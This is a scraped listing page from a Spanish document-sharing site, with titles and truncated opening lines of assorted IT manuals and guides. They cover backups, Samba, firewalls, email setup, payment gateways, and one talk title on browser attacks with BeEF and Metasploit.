MANUAL DEL USUARIO DE MEDINTECH. VERSION 0.1

MANUAL DEL USUARIO DE MEDINTECH. VERSION 0.1 INTRODUCCIÓN A MEDINTECH ESTADO INICIAL: FASE DE TESTEO DIRECCIÓN WEB: http://piloto.medintech.es SECCIÓN: IDEAS Página 1 de 15 En la sección ideas/ofertas se pueden ver las ideas/propuestas de proyectos

Más detalles

MINT A NIVEL BROSERW CON BEEF

MINT A NIVEL BROSERW CON BEEF MINT A NIVEL BROSERW CON BEEF Y METASPLOIT Como usuario seguimos con las mismavulnerabilidades 17 DE ABRIL DEL 2015 SANTA CRUZ BOLIVIA WALTER CAMAMA MENACHO About Me About Me - Ingeniero de sistemas Universidad

Más detalles

MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD

MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD Fecha última revisión: Diciembre 2010 Tareas Programadas TAREAS PROGRAMADAS... 3 LAS TAREAS PROGRAMADAS EN GOTELGEST.NET... 4 A) DAR DE ALTA UN USUARIO...

Más detalles

DECLARACIÓN DE PRIVACIDAD DE FONOWEB

DECLARACIÓN DE PRIVACIDAD DE FONOWEB DECLARACIÓN DE PRIVACIDAD DE FONOWEB Fonoweb se compromete a respetar su privacidad y la confidencialidad de su información personal, los datos de las comunicaciones y el contenido de las comunicaciones

Más detalles

UNIDAD DIDACTICA 16 USUARIOS SAMBA EN UN CONTROLADOR DE DOMINIO LINUX SERVER

UNIDAD DIDACTICA 16 USUARIOS SAMBA EN UN CONTROLADOR DE DOMINIO LINUX SERVER UNIDAD DIDACTICA 16 USUARIOS SAMBA EN UN CONTROLADOR DE DOMINIO LINUX SERVER Eduard Lara 1 1. INTRODUCCIÓN En Windows Server: - Los usuarios y grupos dados de alta cuando el equipo es un servidor independiente,

Más detalles

Instalación. Interfaz gráfico. Programación de Backups. Anexo I: Gestión de la seguridad. Manual de Usuario de Backup Online 1/21.

Instalación. Interfaz gráfico. Programación de Backups. Anexo I: Gestión de la seguridad. Manual de Usuario de Backup Online 1/21. 1/21 Instalación Interfaz gráfico Requerimientos Proceso de instalación Pantalla de login Pantalla principal Descripción de los frames y botones Programación de Backups Botones generales Botones de programación

Más detalles

Manual de Usuario CPM. Consulta Puntual Mínima

Manual de Usuario CPM. Consulta Puntual Mínima Manual de Usuario Consulta Puntual Mínima ÍNDICE DE CONTENIDOS INTRODUCCIÓN Sobre Consulta Puntual Mínima USO DEL SISTEMA 1. Primer acceso - Generación de usuario y contraseña 2. Busqueda de Personas 3.

Más detalles

Aceptamos que realice este proyecto que le hemos solicitado con las siguientes condiciones:

Aceptamos que realice este proyecto que le hemos solicitado con las siguientes condiciones: Aceptamos que realice este proyecto que le hemos solicitado con las siguientes condiciones: La información, textos, imágenes, datos, extensiones que encuentre en la webs indicadas, son de nuestra propiedad

Más detalles

MANUAL DE USUARIO Mensa-Red Empresas (OUTLOOK 2002, 2003 y XP)

MANUAL DE USUARIO Mensa-Red Empresas (OUTLOOK 2002, 2003 y XP) Bienvenido a la ayuda de Mensa-Red Empresas edición e-mail Vodafone. Pulse sobre las distintas opciones para resolver sus dudas. i.conectar (autenticación) ii.envío de mensajes iii.recepción de mensajes

Más detalles

Cortafuegos con Windows 2000 o XP

Cortafuegos con Windows 2000 o XP 1 CÓMO MONTAR UN CORTAFUEGOS SIN SOFTWARE ADICIONAL 1 Cortafuegos con Windows 2000 o XP Por José Mariscal Prieto i72maprj@uco.es Página Web Todos los derechos reservados, este texto esta registrado. 1.

Más detalles

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)

Más detalles

Descripción del Problema Sistema de Reservaciones de Vuelos

Descripción del Problema Sistema de Reservaciones de Vuelos Requisitos: Descripción del Problema Weitzenfeld 1 Descripción del Problema Sistema de Reservaciones de Vuelos El Sistema de Reservaciones de Vuelos es un sistema que permite al usuario hacer consultas

Más detalles

MANUAL DE INSTALACIÓN

MANUAL DE INSTALACIÓN MANUAL DE INSTALACIÓN MANUAL DE INSTALACIÓN DE GOTELGEST.NET En este breve manual sobre la instalación de la aplicación de Gotelgest.net se explicará todo el proceso que hay que llevar a cabo para que

Más detalles

Capítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN

Capítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CONCEPTOS DE PRUEBAS DE APLICACIÓN El departamento de Testing se encarga de diseñar, planear y aplicar el rol de pruebas a los sistemas que el PROVEEDOR

Más detalles

TPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR

TPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR TPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR El TPV (Terminal Punto de Venta) Virtual es un producto dirigido a empresas y comercios, con tienda en internet, que permite el cobro de las ventas realizadas

Más detalles

CheckOUT HELP DESK. Una vez en sesión, UD. Podrá registrar problemas, consultas y hacer un seguimiento de los problemas que UD. ha ingresado.

CheckOUT HELP DESK. Una vez en sesión, UD. Podrá registrar problemas, consultas y hacer un seguimiento de los problemas que UD. ha ingresado. CheckOUT HELP DESK CHECKOUT IT implementará un cambio en el modo de atención en el servicio de Soporte Técnico. De ahora en más, UD. podrá registrar los problemas, consultas, etc. que esté teniendo con

Más detalles

Configuración de correo en Mozilla Thunderbird

Configuración de correo en Mozilla Thunderbird Configuración de correo en Mozilla Thunderbird INTRODUCCIÓN El propósito de este manual es configurar nuestro cliente de correo Mozilla Thunderbird. Podremos añadir nuevas cuentas o cambiar los parámetros

Más detalles

www.hostigal.com info@hostigal.com +34 902 010 274 DOMINIOS Copyright HOSTISOFT, S.L.

www.hostigal.com info@hostigal.com +34 902 010 274 DOMINIOS Copyright HOSTISOFT, S.L. DOMINIOS Copyright HOSTISOFT, S.L. Registre sus dominios con grito.net por sólo 10 Con grito.net, podrá gestionar la configuración de sus dominios mediante un completo panel de control. Los parámetros

Más detalles

Gracias a ese IP único que tiene cada ordenador conectado a la red de internet se pueden identificar y comunicar los ordenadores.

Gracias a ese IP único que tiene cada ordenador conectado a la red de internet se pueden identificar y comunicar los ordenadores. COMO FUNCIONA INTERNET Internet es una gran red de ordenadores a nivel mundial, que pueden intercambiar información entre ellos. Se pueden comunicar porque están unidos a través de conexiones telefónicas,

Más detalles

Como acceder al sistema de tickets de Fabergames:

Como acceder al sistema de tickets de Fabergames: Como acceder al sistema de tickets de Fabergames: Desde fabergames.com pulsando sobre SOPORTE o desplegando la sección SOPORTE y pulsando sobre HELPDESK. La URL directa al soporte es: http://www.fabergames.com/helpdesk

Más detalles

MANUAL PARA SUBIR EL RESUMEN DEL TRABAJO FIN DE MASTER EN EASYCHAIR

MANUAL PARA SUBIR EL RESUMEN DEL TRABAJO FIN DE MASTER EN EASYCHAIR MANUAL PARA SUBIR EL RESUMEN DEL TRABAJO FIN DE MASTER EN EASYCHAIR DISTINCIONES TFM REDINTUR 2015 1. Ingresar al sitio Para enviar un resumen ejecutivo de un TFM candidato a la distinción 1 a través de

Más detalles

MANUAL DE CLIENTE RECEPTOR

MANUAL DE CLIENTE RECEPTOR MANUAL DE CLIENTE RECEPTOR CLICKFACTURA SERVICIO CLICKFACTURA 2015 Copyright El contenido de este documento está sujeto a cambios sin previa notificación. Se prohíbe cualquier reproducción o copia sin

Más detalles

Manual Proceso Completo [3/11/2009]

Manual Proceso Completo [3/11/2009] Manual Proceso Completo [3/11/2009] Instalación Proceso Completo...2 Acceso Proceso Completo...2 Archivos y Carpetas...2 Proceso Completo...3 Configuración de interface.ini...4 Configuración de procesocompleto.ini...4

Más detalles

Guía de Integración del botón IUPAY para comercios SIS

Guía de Integración del botón IUPAY para comercios SIS Versión: 1.0 Versión: 1.0 1 Autorizaciones y control de versión AUTOR: REDSYS VALIDADO POR: APROBADO POR: EMPRESA: REDSYS EMPRESA: REDSYS EMPRESA: REDSYS Firma: Firma: Firma: Fecha: Fecha: Fecha: Comentarios:

Más detalles